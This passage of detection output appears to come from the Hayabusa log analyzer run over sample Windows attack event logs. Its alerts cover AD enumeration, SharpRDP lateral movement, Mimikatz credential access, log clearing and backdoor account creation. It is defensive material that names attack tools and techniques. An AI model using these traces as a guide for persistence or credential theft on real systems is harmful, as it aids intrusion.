05:57:40.825 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:57:52.909 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: ATACORE01$ : Workstation: - : IP Address: 10.23.42.30 : Port: 62476 : LogonID: 0x64f5ef5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:58:11.977 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 59641 : LogonID: 
0x64f6471,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:58:11.981 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: ROOTDC1$ : Workstation: - : IP Address: fe80::1cae:5aa4:9d8d:106a : Port: 51370 : LogonID: 0x64f64a3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:58:12.004 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 59643 : LogonID: 0x64f64ca,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:58:12.005 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 59644 : LogonID: 0x64f64e1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:58:12.005 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 59645 : LogonID: 0x64f64f3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 06:22:31.163 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User 
Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738,5136-SPN set on user account.evtx" +2020-07-10 06:25:41.773 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738,5136-SPN set on user account.evtx" +2020-07-10 07:00:14.124 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:14.195 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:17.584 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\windows\system32\notepad.exe"" : Path: C:\Windows\System32\notepad.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:17.591 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:17.591 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:17.591 
+09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:28.307 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:28.458 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:31.217 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\windows\system32\notepad.exe"" : Path: C:\Windows\System32\notepad.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:31.217 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:31.218 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:42.919 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 
07:00:43.042 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:45.589 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:45.590 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:45.590 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:45.590 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:48.105 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: c:\windows\system32\notepad.exe : Path: C:\Windows\System32\notepad.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:01:01.154 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys 
Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:01:01.337 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:01:03.898 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe"" : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:01:03.899 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:01:03.900 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:01:03.902 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:01:06.427 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\windows\system32\notepad.exe"" : Path: C:\Windows\System32\notepad.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:02:42.085 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:05:58.373 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:06:07.487 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\Explorer.EXE : Path: C:\Windows\explorer.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\userinit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:06:14.112 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:06:14.229 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:06:20.184 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:06:20.185 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun 
Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:06:20.185 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:07:33.800 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 19:20:34.910 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: rdpclip : Path: C:\Windows\System32\rdpclip.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\System32\svchost.exe -k NetworkService -s TermService,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx +2020-07-10 19:20:35.886 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx +2020-07-10 19:20:35.913 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx +2020-07-10 19:20:37.637 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""\\tsclient\c\temp\stack\a.exe"" : Path: \\tsclient\c\temp\stack\a.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx +2020-07-10 19:20:37.672 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx +2020-07-10 19:20:37.672 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx +2020-07-10 19:20:37.672 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx +2020-07-10 19:20:58.942 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx +2020-07-11 22:21:11.693 +09:00,wec02,70,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx +2020-07-11 22:21:11.693 +09:00,wec02,70,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx +2020-07-11 22:21:17.514 +09:00,wec02,70,critical,Mimikatz 
Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx +2020-07-11 22:21:17.514 +09:00,wec02,70,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx +2020-07-11 22:21:18.640 +09:00,wec02,70,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx +2020-07-11 22:21:18.640 +09:00,wec02,70,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx +2020-07-12 02:16:42.576 +09:00,fs02.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5142- New file share created.evtx +2020-07-12 02:16:42.592 +09:00,fs02.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5142- New file share created.evtx +2020-07-12 02:16:50.984 +09:00,fs02.offsec.lan,5145,informational,Network 
Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5142- New file share created.evtx +2020-07-12 02:17:49.788 +09:00,fs02.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5143-File share permissions changed.evtx +2020-07-12 02:17:49.788 +09:00,fs02.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5143-File share permissions changed.evtx +2020-07-12 02:18:01.228 +09:00,fs02.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5143-File share permissions changed.evtx +2020-07-12 06:38:17.445 +09:00,fs02.offsec.lan,4699,medium,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4698-4699-Fast created & deleted task by SMBexec (sups. 
arg.).evtx +2020-07-12 06:49:56.318 +09:00,fs02.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-Random service installation.evtx +2020-07-12 14:10:08.442 +09:00,rootdc1.offsec.lan,4720,medium,Local user account created,User: admin-kriss : SID:S-1-5-21-4230534742-2542757381-3142984815-1166,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-4726 Fast created-deleted user.evtx +2020-07-12 14:10:08.442 +09:00,rootdc1.offsec.lan,4720,medium,Local user account created,User: admin-kriss : SID:S-1-5-21-4230534742-2542757381-3142984815-1166,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-Admin like user created.evtx +2020-07-12 14:12:58.295 +09:00,jump01.offsec.lan,4720,medium,Local user account created,User: hacking-local-acct : SID:S-1-5-21-1470532092-3758209836-3742276719-1001,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-Local user created.evtx +2020-07-12 14:14:30.976 +09:00,jump01.offsec.lan,4732,high,User added to local Administrators group,User: - : SID: S-1-5-21-1470532092-3758209836-3742276719-1001 : Group: Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4732-User added to local admin groups.evtx +2020-07-12 14:14:30.976 
+09:00,jump01.offsec.lan,4732,high,User added to local Administrators group,User: - : SID: S-1-5-21-1470532092-3758209836-3742276719-1001 : Group: Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4732-4733-Quick added-removed user from local group.evtx +2020-07-12 14:17:23.107 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=lambda-user,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1158 : Group: Group02",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Member adding to a group by the same account.evtx +2020-07-12 14:17:23.107 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=lambda-user,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1158 : Group: Group02 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Member adding to a group by the same account.evtx +2020-07-12 14:19:54.561 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group01",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.561 
+09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group01 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.564 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group02",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.564 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group02 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.566 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group03",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive 
